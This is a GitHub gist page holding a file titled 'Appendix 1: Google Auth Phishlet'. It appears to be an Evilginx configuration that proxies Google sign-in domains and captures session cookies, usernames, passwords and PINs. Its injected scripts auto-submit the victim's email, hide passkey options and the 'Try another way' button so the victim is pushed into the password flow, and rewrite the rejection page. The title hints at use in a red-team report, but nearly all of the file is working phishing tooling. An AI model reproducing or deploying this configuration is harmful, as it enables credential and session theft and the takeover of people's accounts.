-
-
Save resource-not-found/664ed92b5aa086e7f7fce3d48cb77352 to your computer and use it in GitHub Desktop.
Appendix 1: Google Auth Phishlet
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
min_ver: '3.0.0' | |
redirect_url: 'https://www.[ORIGIN_DOMAIN].com/' | |
proxy_hosts: | |
- {phish_sub: 'training', orig_sub: 'accounts', domain: 'google.com', session: true, is_landing: true} | |
- {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'google.ru', session: false, is_landing: false} | |
- {phish_sub: 'myaccount', orig_sub: 'myaccount', domain: 'google.com', session: false, is_landing: false} | |
- {phish_sub: 'mail', orig_sub: 'mail', domain: 'google.com', session: false, is_landing: false} | |
- {phish_sub: 'chat', orig_sub: 'chat', domain: 'google.com', session: false, is_landing: false} | |
- {phish_sub: 'apis', orig_sub: 'apis', domain: 'google.com', session: false, is_landing: false} | |
- {phish_sub: 'play', orig_sub: 'play', domain: 'google.com', session: false, is_landing: false} | |
- {phish_sub: 'www', orig_sub: 'www', domain: 'google.com', session: false, is_landing: false} | |
- {phish_sub: 'lh3', orig_sub: 'lh3', domain: 'google.com', session: false, is_landing: false} | |
- {phish_sub: 'www', orig_sub: 'www', domain: 'gstatic.com', session: false, is_landing: false} | |
- {phish_sub: 'ssl', orig_sub: 'ssl', domain: 'gstatic.com', session: false, is_landing: false} | |
- {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'youtube.com', session: false, is_landing: false} | |
- {phish_sub: 'signaler-pa', orig_sub: 'signaler-pa', domain: 'googleapis.com', session: false, is_landing: false} | |
- {phish_sub: 'ajax', orig_sub: 'ajax', domain: 'googleapis.com', session: false, is_landing: false} | |
auth_tokens: | |
- domain: '.google.com' | |
keys: [".*,regexp"] | |
- domain: 'accounts.google.com' | |
keys: [".*,regexp"] | |
credentials: | |
username: | |
key: 'identifier' | |
search: '(.*)' | |
type: 'post' | |
password: | |
key: 'Passwd' | |
search: '(.*)' | |
type: 'post' | |
custom: | |
- key: 'Pin' | |
search: '(.*)' | |
type: 'post' | |
auth_urls: | |
- '/CheckCookie' | |
- '/RotateCookies' | |
login: | |
domain: 'google.com' | |
path: '/v3/signin/identifier?flowName=WebLiteSignIn' | |
js_inject: | |
- trigger_domains: ["accounts.google.com"] | |
trigger_paths: ["/v3/signin/identifier"] | |
trigger_params: ["email"] | |
script: | | |
document.body.style.display = 'none'; | |
function lp(){ | |
document.querySelector('#identifierNext').click(); | |
} | |
var email = document.querySelector('#identifierId'); | |
if (email != null) { | |
email.value = '{email}'; | |
setTimeout(function(){lp();}, 3000); | |
} else { | |
document.body.style.display = ''; | |
} | |
- trigger_domains: ["accounts.google.com"] | |
trigger_paths: ["/v3/signin/challenge/pwd"] | |
script: | | |
document.body.style.display = 'none'; | |
var paragraphs = Array.from(document.querySelectorAll('p')); | |
var targetParagraph = paragraphs.find(p => | |
p.textContent.includes('Select "Try another way" to use') || | |
p.textContent.includes('Чтобы использовать ключ доступа') | |
); | |
if (targetParagraph) { | |
var targetSection = targetParagraph.parentElement.parentElement.parentElement; | |
if (targetSection) { | |
targetSection.hidden = true; | |
} | |
} | |
var buttons = document.querySelectorAll('button'); | |
buttons.forEach(button => { | |
if (button.textContent.trim() === 'Try another way' || button.textContent.trim() === 'Другой способ') { | |
button.textContent = ''; | |
} | |
}); | |
document.body.style.display = ''; | |
- trigger_domains: ["accounts.google.com"] | |
trigger_paths: ["/v3/signin/challenge/pk/presend"] | |
script: | | |
document.body.style.display = 'none'; | |
var buttons = document.querySelectorAll('button'); | |
buttons.forEach(button => { | |
if (button.textContent.trim() === 'Try another way' || button.textContent.trim() === 'Другой способ') { | |
button.click(); | |
} | |
}); | |
- trigger_domains: ["accounts.google.com"] | |
trigger_paths: ["/v3/signin/challenge/selection"] | |
script: | | |
document.body.style.display = 'none'; | |
var spans = document.querySelectorAll('span'); | |
spans.forEach(span => { | |
if (span.textContent.trim() === 'Enter your password' || span.textContent.trim() === 'Введите пароль') { | |
document.body.style.display = 'none'; | |
span.parentElement.parentElement.click(); | |
} | |
if (span.textContent.trim() === 'Use your passkey' || span.textContent.trim() === 'Использовать ключ доступа') { | |
console.log(span); | |
span.parentElement.parentElement.parentElement.parentElement.hidden = true; | |
} | |
}); | |
document.body.style.display = ''; | |
- trigger_domains: ["accounts.google.com"] | |
trigger_paths: ["/v3/signin/rejected"] | |
script: | | |
document.body.style.display = 'none'; | |
var paragraphs = Array.from(document.querySelectorAll('p')); | |
var targetParagraph1 = paragraphs.find(p => | |
p.textContent.includes('Contact your domain admin for help') | |
); | |
if (targetParagraph1) { | |
targetParagraph1.innerHTML = 'Use this link to change your password: <a href="https://myaccount.google.com/u/1/signinoptions/password">Change Password</a><br>or contact your domain admin for help: <a href="mailto:administrator@[ORIGIN_DOMAIN].org">Send Email</a>'; | |
} | |
var targetParagraph2 = paragraphs.find(p => | |
p.textContent.includes('Обратитесь за помощью к администратору домена') | |
); | |
if (targetParagraph2) { | |
targetParagraph2.innerHTML = 'Используйте эту ссылку для восстановления пароля: <a href="https://myaccount.google.com/u/1/signinoptions/password">Изменить пароль</a><br>или обратитесь за помощью к администратору домена: <a href="mailto:administrator@[ORIGIN_DOMAIN].org">Написать письмо</a>'; | |
} | |
document.body.style.display = ''; |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment